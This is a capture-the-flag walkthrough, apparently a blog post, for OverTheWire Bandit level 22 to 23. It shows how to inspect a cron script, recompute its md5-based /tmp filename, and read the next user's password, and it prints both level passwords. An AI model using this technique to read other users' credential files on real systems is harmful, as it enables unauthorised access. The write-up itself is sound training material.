View a created script and use the info to run a custom command.
Host name is: bandit.labs.overthewire.org
User: bandit22
password: Yk7owGAcWjwMVRwrTesJEwB7WVOiILLI
Goal: A program is running automatically at regular intervals from
cron, the time-based job scheduler. Look in /etc/cron.d/ for
the configuration and see what command is being executed.
Commands used for this level:
ls -l - List information about all the file's and use a long listing format.
cat - used to view contents of a file.
whoami - print effective userid
Step 1.
This looks exactly like the last level so let's follow what we did last level.
Type ls -l /etc/cron.d/
Just like last level we see a cronjob_bandit23 file
Step 2.
Let's cat that file
cat /etc/cron.d/cronjob_bandit23
We get the output to a file location that runs at /usr/bin/cronjob_bandit23.sh
Step 3.
Let's cat that file in step 2.
cat /usr/bin/cronjob_bandit23.sh
We see get another bin bash script
#!/bin/bash
myname=$(whoami)
mytarget=$(echo I am user $myname | md5sum | cut -d ' ' -f 1)
echo "Copying passwordfile /etc/bandit_pass/$myname to /tmp/$mytarget"
cat /etc/bandit_pass/$myname > /tmp/$mytarget
It looks like this script sends the output of a cat on
/etc/bandit_pass/$myname to /tmp/$mytarget
Step 4.
Again like before let's cat that copied file location to see what it has in it.
cat /tmp/$mytarget
This time we get /tmp/: Permission denied
Hmm looks like the $ may have blocked our full file location because it only shows /tmp/ in the output.
Let's go back and read our NOTE for the GOAL.
NOTE: Looking at shell scripts written by other people is a
very useful skill. The script for this level is intentionally made
easy to read. If you are having problems understanding what it does,
try executing it to see the debug information it prints.
Ah $ is used for shell so let's read about shell scripts and we should try to execute the script to see what it does.
Step 5.
Type /usr/bin/cronjob_bandit23.sh
We get the output: Copying passwordfile /etc/bandit_pass/bandit22 to /tmp/8169b67bd894ddbb4412f91573b38db3
Step 6.
Let's cat that file location
cat /tmp/8169b67bd894ddbb4412f91573b38db3
We get our current password output. Yk7owGAcWjwMVRwrTesJEwB7WVOiILLI
Not what we want.
Step 7.
Let's go back and look at cronjob_bandit23.sh script
Type /usr/bin/cronjob_bandit23.sh
We get the output: Copying passwordfile /etc/bandit_pass/bandit22 to /tmp/8169b67bd894ddbb4412f91573b38db3 We missed something, see how it says bandit22, not what we want. We want bandit23 password. Let's look at how the script works again.
myname=$(whoami)
mytarget=$(echo I am user $myname | md5sum | cut -d ' ' -f 1)
echo "Copying passwordfile /etc/bandit_pass/$myname to /tmp/$mytarget"
cat /etc/bandit_pass/$myname > /tmp/$mytarget
That first part myname=$(whoami) sets myname to our name. Go ahead and do a whoami. It returns who we are logged in as bandit22.
The second part mytarget=$(echo I am user $myname | md5sum | cut -d ' ' -f 1) looks like the command that is run during this script where $myname is set to bandit22 and we know we want bandit23 password. Let's take that part of the script and replace the $myname part with bandit23 instead of letting the script set it to our current uid.
Type echo I am user bandit23 | md5sum | cut -d ' ' -f 1
We get 8ca319486bfbbc3663ea0fbe81326349 output.
Step 8.
Hmm that output above looks familiar lets do a cat on the output file.
Type cat /tmp/8ca319486bfbbc3663ea0fbe81326349
Look at that it looks like we have our next level password output:
jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n
No comments:
Post a Comment